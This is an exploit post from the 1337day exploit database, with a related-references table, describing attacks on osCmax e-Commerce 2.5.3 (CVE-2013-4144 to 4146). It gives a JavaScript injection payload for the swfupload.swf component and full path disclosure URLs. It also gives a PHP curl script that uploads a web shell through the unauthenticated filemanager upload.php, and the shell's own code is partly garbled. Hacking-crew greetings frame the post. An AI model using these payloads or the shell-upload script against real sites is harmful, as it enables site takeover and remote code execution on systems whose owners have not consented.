`> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [>] Title : osCmax e-Commerce v2.5.3 (FU/ObjectInject) Multiple Vulnerabilities [>] Author : KedAns-Dz [+] E-mail : ked-h (@hotmail.com / @1337day.com) [+] FaCeb0ok : fb.me/Inj3ct0rK3d [+] TwiTter : @kedans [#] Platform : PHP / WebApp [+] Cat/Tag : Multiple , File/shell Upload , Object Injection [<] <3 <3 Greetings t0 Palestine <3 <3 [>] <3 R.I.P NelsOn MandEla <3 [ps]: Algeria vs Russia o.O Brazil 2014 ... u think a HaCk-WAR be coming !!? LOL héhéhé we are brothers in the Cyber NetWork ^__^ <3 Russia <3 1,2,3 Viva l'Algerie | 4,5,6 we fall in love with Russian GIRL's xD lol. > Give me a algerian , and Korian-Car & Russian Weapon & European Enemy > see result : (http://static.echoroukonline.com/ara/files/2012/baki_tintin_967504998.jpg) ##### # [!] Description : # # P.O.C : # - [ CVE-2013-4144 , CVE-2013-4145 , CVE-2013-4146 ] # - [ OSVDB-92635 ] [ 1337day-2013-20669 ] # - [ new 0day ] # # osCmax e-Commerce v2.5.3 is suffer from multiple vulnerabilities # remote attacker can upload file/shell via header attacks or exec # a JavaScript Code & Inject a remote Object ( see also : CVE-2013-4144 ) ##### # [+] Exploit (1) ' Object Injection / JS Injection ' : [ CVE-2013-4144 , OSVDB-92635 ( also found by me :p )] # # JS alert() Code : %22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;// # # http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?movieName=[ JS Code ] # http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?buttonImageURL=[ Object/Image URL ] # ##### # [+] Exploit (2) ' Full Path Disclosure ' : # http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.php # http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.simple.php ##### # [+] Exploit (3) ' File/shell Upload ' : #**/?> "; # U'r Sh3lL h3re ! $path ="/temp/"; # Sh3lL Path #----------------------------------------------------------------------------- $ch = curl_init("http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$shell", 'uploadpath'=>"@$path")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; #----------------------------------------------------------------------------- ?> # [!] find file : /temp/shell.php #<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +> #<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +> # ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > * # ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria ** #--------------------------------------------------------------- # Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , & # & KnocKout , Angel Injection , The Black Devils , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= #### **/?> # 1337day.com id:[1337day-2013-21633] `

Reporter	Title	Published	Views	Family All 4
CVE	CVE-2013-4146	30 Jun 202212:36	–	cve
NVD	CVE-2013-4146	30 Jun 202213:15	–	nvd
Packet Storm	osCmax e-Commerce 2.5.3 Cross Site Scripting / Shell Upload	9 Dec 201300:00	–	packetstorm
Prion	Design/Logic Flaw	30 Jun 202213:15	–	prion